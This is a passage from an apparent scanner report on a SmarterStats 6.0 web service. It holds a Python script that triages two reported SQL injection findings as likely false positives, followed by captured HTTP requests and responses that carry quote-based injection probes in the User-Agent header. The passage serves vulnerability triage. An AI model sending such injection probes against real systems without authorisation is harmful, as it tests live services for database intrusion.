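<body><p class="heading1">SiteAdmin</p><h2>MoveSite</h2></body></html>"""

# Constructed contrast case: a genuine quote-induced database error on ASP.NET.
# Not observed against SmarterStats.
SQL_500 = """<html><body><H1>Server Error in '/' Application.</H1>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Unclosed quotation mark after the character string ''.<br>
</body></html>"""


def quote_payloads(bypass=None):
    """Return (one_quote, two_quotes) encoded the way the report sent them.

    'nullbyte'   -> %00' and %00''        (finding 2.15, cookie value)
    'double-url' -> %2527 and %2527%2527  (finding 2.16, header value)
    """
    base = ("'", "''")
    if bypass == "nullbyte":
        return tuple("%00" + p for p in base)
    if bypass == "double-url":
        return tuple(quote(quote(p, safe=""), safe="") for p in base)
    return base


def extract_exception(body):
    """Pull the CLR exception type out of an ASP.NET error page."""
    m = re.search(r"Exception Details:\s*</b>\s*([\w.]+):", body)
    return m.group(1) if m else None


def classify_error(status, body):
    """Return 'none', 'sql', 'non-sql:<ExceptionType>' or 'unknown-error'."""
    if status < 500 and "Server Error in" not in body:
        return "none"
    if any(marker in body for marker in SQL_ERROR_MARKERS):
        return "sql"
    exc = extract_exception(body)
    return f"non-sql:{exc}" if exc else "unknown-error"


def differential_verdict(resp_one_quote, resp_two_quotes):
    """Apply the scanner heuristic, then refine it by error class.

    Each argument is a (status, body) pair. The heuristic alone says
    'vulnerable' whenever one quote errors and two quotes do not; the
    refinement downgrades that when the error never reached the database.
    """
    kind1 = classify_error(*resp_one_quote)
    kind2 = classify_error(*resp_two_quotes)
    if kind1 == "none":
        return "no-signal"
    if kind2 != "none":
        return "both-error: not quote-sensitive"
    if kind1 == "sql":
        return "sql-error-quote-sensitive: investigate"
    return f"likely-false-positive ({kind1})"


def triage_report_findings():
    """Re-run the verdict on the two findings exactly as captured in the report."""
    observed = (500, ASPNET_500), (200, HELP_PAGE_200)
    return {
        "2.15 SelectedLanguage cookie": (quote_payloads("nullbyte"), differential_verdict(*observed)),
        "2.16 User-Agent header": (quote_payloads("double-url"), differential_verdict(*observed)),
    }


if __name__ == "__main__":
    for finding, (payloads, verdict) in triage_report_findings().items():
        print(f"{finding}: payloads={payloads} -> {verdict}")
```

Against live traffic, replace the constructed bodies with the (status, body) pairs returned for the one-quote and two-quote payloads, sent several seconds apart so a concurrency error in the help generator cannot masquerade as a quote-sensitive response.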

Request 1

GET /Services/SiteAdmin.asmx?op=AddSiteWithFTP2 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:03:31 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6785
Connection: Close

<html>
<head>
<title>Collection was modified; enumeration operation may not execute.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Collection was modified; enumeration operation may not execute.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.InvalidOperationException: Collection was modified; enumeration operation may not execute.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[InvalidOperationException: Collection was modified; enumeration operation may not execute.]
System.Collections.HashtableEnumerator.MoveNext() +12630115
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +536
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[InvalidOperationException]: Collection was modified; enumeration operation may not execute.
at System.Collections.Hashtable.HashtableEnumerator.MoveNext()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=AddSiteWithFTP2 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:03:33 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 25993
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>

<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>AddSiteWithFTP2</h2>
<p class="intro">Adds a site with ftp logs to the MRS.</p>

<h3>Test</h3>

To test the operation using the HTTP POST protocol, click the 'Invoke' button.



<form target="_blank" action='http://localhost:9999/Services/SiteAdmin.asmx/AddSiteWithFTP2' method="POST">

<table cellspacing="0" cellpadding="4" frame="box" bordercolor="#dcdcdc" rules="none" style="border-collapse: collapse;">
<tr>
   <td class="frmHeader" background="#dcdcdc" style="border-right: 2px solid white;">Parameter</td>
   <td class="frmHeader" background="#dcdcdc">Value</td>
</tr>


<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authUserName:</td>
<td><input class="frmInput" type="text" size="50" name="authUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authPassword:</td>
<td><input class="frmInput" type="text" size="50" name="authPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soUserName:</td>
<td><input class="frmInput" type="text" size="50" name="soUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soPassword:</td>
<td><input class="frmInput" type="text" size="50" name="soPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soFirstName:</td>
<td><input class="frmInput" type="text" size="50" name="soFirstName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soLastName:</td>
<td><input class="frmInput" type="text" size="50" name="soLastName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ServerID:</td>
<td><input class="frmInput" type="text" size="50" name="ServerID"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SiteID:</td>
<td><input class="frmInput" type="text" size="50" name="SiteID"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">DomainName:</td>
<td><input class="frmInput" type="text" size="50" name="DomainName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogFormat:</td>
<td><input class="frmInput" type="text" size="50" name="LogFormat"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogWildcard:</td>
<td><input class="frmInput" type="text" size="50" name="LogWildcard"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogDaysBeforeDelete:</td>
<td><input class="frmInput" type="text" size="50" name="LogDaysBeforeDelete"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SmarterLogDirectory:</td>
<td><input class="frmInput" type="text" size="50" name="SmarterLogDirectory"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SmarterLogMonthsBeforeDelete:</td>
<td><input class="frmInput" type="text" size="50" name="SmarterLogMonthsBeforeDelete"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ExportPath:</td>
<td><input class="frmInput" type="text" size="50" name="ExportPath"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ExportPathURL:</td>
<td><input class="frmInput" type="text" size="50" name="ExportPathURL"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">TimeZoneIndex:</td>
<td><input class="frmInput" type="text" size="50" name="TimeZoneIndex"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Directory:</td>
<td><input class="frmInput" type="text" size="50" name="Directory"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyType:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyType"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyAddress:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyAddress"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyPort:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyPort"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyUserName:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ProxyPassword:</td>
<td><input class="frmInput" type="text" size="50" name="ProxyPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Server:</td>
<td><input class="frmInput" type="text" size="50" name="Server"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Port:</td>
<td><input class="frmInput" type="text" size="50" name="Port"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Username:</td>
<td><input class="frmInput" type="text" size="50" name="Username"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">Password:</td>
<td><input class="frmInput" type="text" size="50" name="Password"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">IntervalHours:</td>
<td><input class="frmInput" type="text" size="50" name="IntervalHours"></td>
</tr>

<tr>
<td></td>
<td align="right"> <input type="submit" value="Invoke" class="button"></td>
</tr>
</table>


</form>
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/AddSiteWithFTP2"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;AddSiteWithFTP2 xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;soUserName&gt;<font class=value>string</font>&lt;/soUserName&gt;
&lt;soPassword&gt;<font class=value>string</font>&lt;/soPassword&gt;
&lt;soFirstName&gt;<font class=value>string</font>&lt;/soFirstName&gt;
&lt;soLastName&gt;<font class=value>string</font>&lt;/soLastName&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;Directory&gt;<font class=value>string</font>&lt;/Directory&gt;
&lt;ProxyType&gt;<font class=value>string</font>&lt;/ProxyType&gt;
&lt;ProxyAddress&gt;<font class=value>string</font>&lt;/ProxyAddress&gt;
&lt;ProxyPort&gt;<font class=value>int</font>&lt;/ProxyPort&gt;
&lt;ProxyUserName&gt;<font class=value>string</font>&lt;/ProxyUserName&gt;
&lt;ProxyPassword&gt;<font class=value>string</font>&lt;/ProxyPassword&gt;
&lt;Server&gt;<font class=value>string</font>&lt;/Server&gt;
&lt;Port&gt;<font class=value>int</font>&lt;/Port&gt;
&lt;Username&gt;<font class=value>string</font>&lt;/Username&gt;
&lt;Password&gt;<font class=value>string</font>&lt;/Password&gt;
&lt;IntervalHours&gt;<font class=value>int</font>&lt;/IntervalHours&gt;
&lt;/AddSiteWithFTP2&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;AddSiteWithFTP2Response xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;AddSiteWithFTP2Result&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/AddSiteWithFTP2Result&gt;
&lt;/AddSiteWithFTP2Response&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;AddSiteWithFTP2 xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;soUserName&gt;<font class=value>string</font>&lt;/soUserName&gt;
&lt;soPassword&gt;<font class=value>string</font>&lt;/soPassword&gt;
&lt;soFirstName&gt;<font class=value>string</font>&lt;/soFirstName&gt;
&lt;soLastName&gt;<font class=value>string</font>&lt;/soLastName&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;Directory&gt;<font class=value>string</font>&lt;/Directory&gt;
&lt;ProxyType&gt;<font class=value>string</font>&lt;/ProxyType&gt;
&lt;ProxyAddress&gt;<font class=value>string</font>&lt;/ProxyAddress&gt;
&lt;ProxyPort&gt;<font class=value>int</font>&lt;/ProxyPort&gt;
&lt;ProxyUserName&gt;<font class=value>string</font>&lt;/ProxyUserName&gt;
&lt;ProxyPassword&gt;<font class=value>string</font>&lt;/ProxyPassword&gt;
&lt;Server&gt;<font class=value>string</font>&lt;/Server&gt;
&lt;Port&gt;<font class=value>int</font>&lt;/Port&gt;
&lt;Username&gt;<font class=value>string</font>&lt;/Username&gt;
&lt;Password&gt;<font class=value>string</font>&lt;/Password&gt;
&lt;IntervalHours&gt;<font class=value>int</font>&lt;/IntervalHours&gt;
&lt;/AddSiteWithFTP2&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;AddSiteWithFTP2Response xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;AddSiteWithFTP2Result&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/AddSiteWithFTP2Result&gt;
&lt;/AddSiteWithFTP2Response&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>

<span>
<h3>HTTP GET</h3>
<p>The following is a sample HTTP GET request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>GET /Services/SiteAdmin.asmx/AddSiteWithFTP2?<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>soUserName</font>=<font class=value>string</font>&amp;<font class=key>soPassword</font>=<font class=value>string</font>&amp;<font class=key>soFirstName</font>=<font class=value>string</font>&amp;<font class=key>soLastName</font>=<font class=value>string</font>&amp;<font class=key>ServerID</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font>&amp;<font class=key>DomainName</font>=<font class=value>string</font>&amp;<font class=key>LogFormat</font>=<font class=value>string</font>&amp;<font class=key>LogWildcard</font>=<font class=value>string</font>&amp;<font class=key>LogDaysBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogDirectory</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogMonthsBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>ExportPath</font>=<font class=value>string</font>&amp;<font class=key>ExportPathURL</font>=<font class=value>string</font>&amp;<font class=key>TimeZoneIndex</font>=<font class=value>string</font>&amp;<font class=key>Directory</font>=<font class=value>string</font>&amp;<font class=key>ProxyType</font>=<font class=value>string</font>&amp;<font class=key>ProxyAddress</font>=<font class=value>string</font>&amp;<font class=key>ProxyPort</font>=<font class=value>string</font>&amp;<font class=key>ProxyUserName</font>=<font class=value>string</font>&amp;<font class=key>ProxyPassword</font>=<font class=value>string</font>&amp;<font class=key>Server</font>=<font class=value>string</font>&amp;<font class=key>Port</font>=<font class=value>string</font>&amp;<font class=key>Username</font>=<font class=value>string</font>&amp;<font class=key>Password</font>=<font class=value>string</font>&amp;<font class=key>IntervalHours</font>=<font class=value>string</font> HTTP/1.1
Host: localhost
</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

<span>
<h3>HTTP POST</h3>
<p>The following is a sample HTTP POST request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx/AddSiteWithFTP2 HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: <font class=value>length</font>

<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>soUserName</font>=<font class=value>string</font>&amp;<font class=key>soPassword</font>=<font class=value>string</font>&amp;<font class=key>soFirstName</font>=<font class=value>string</font>&amp;<font class=key>soLastName</font>=<font class=value>string</font>&amp;<font class=key>ServerID</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font>&amp;<font class=key>DomainName</font>=<font class=value>string</font>&amp;<font class=key>LogFormat</font>=<font class=value>string</font>&amp;<font class=key>LogWildcard</font>=<font class=value>string</font>&amp;<font class=key>LogDaysBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogDirectory</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogMonthsBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>ExportPath</font>=<font class=value>string</font>&amp;<font class=key>ExportPathURL</font>=<font class=value>string</font>&amp;<font class=key>TimeZoneIndex</font>=<font class=value>string</font>&amp;<font class=key>Directory</font>=<font class=value>string</font>&amp;<font class=key>ProxyType</font>=<font class=value>string</font>&amp;<font class=key>ProxyAddress</font>=<font class=value>string</font>&amp;<font class=key>ProxyPort</font>=<font class=value>string</font>&amp;<font class=key>ProxyUserName</font>=<font class=value>string</font>&amp;<font class=key>ProxyPassword</font>=<font class=value>string</font>&amp;<font class=key>Server</font>=<font class=value>string</font>&amp;<font class=key>Port</font>=<font class=value>string</font>&amp;<font class=key>Username</font>=<font class=value>string</font>&amp;<font class=key>Password</font>=<font class=value>string</font>&amp;<font class=key>IntervalHours</font>=<font class=value>string</font></pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

</span>

</body>
</html>

2.17. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [loginsettings cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

